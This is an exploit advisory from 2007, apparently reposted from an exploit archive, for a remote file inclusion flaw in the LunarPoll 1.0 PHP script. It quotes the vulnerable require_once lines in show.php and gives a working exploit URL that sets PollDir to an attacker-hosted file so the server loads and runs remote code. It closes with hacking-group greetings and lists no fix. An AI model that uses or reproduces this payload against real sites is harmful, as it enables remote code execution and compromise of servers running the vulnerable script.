LunarPoll 1.0 (show.php PollDir) Remote File Include Vulnerability

2007-01-12 00:00:00

-------------------------------------------------------------------------------------------------------------------

AYYILDIZ.ORG PreSents...


Script:LunarPoll
Script Download: dexxaboy.com/scripts/lunarpoll/download/

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
require_once($PollDir.'/includes/functions.php');
require_once($PollDir.'/includes/IO.php');

-------------------------------------------------------------------------------------------------------------------

Exploit: show.php?PollDir=http://attacker.txt?

-------------------------------------------------------------------------------------------------------------------

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR
Special Tnx: AYYILDIZ.ORG

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.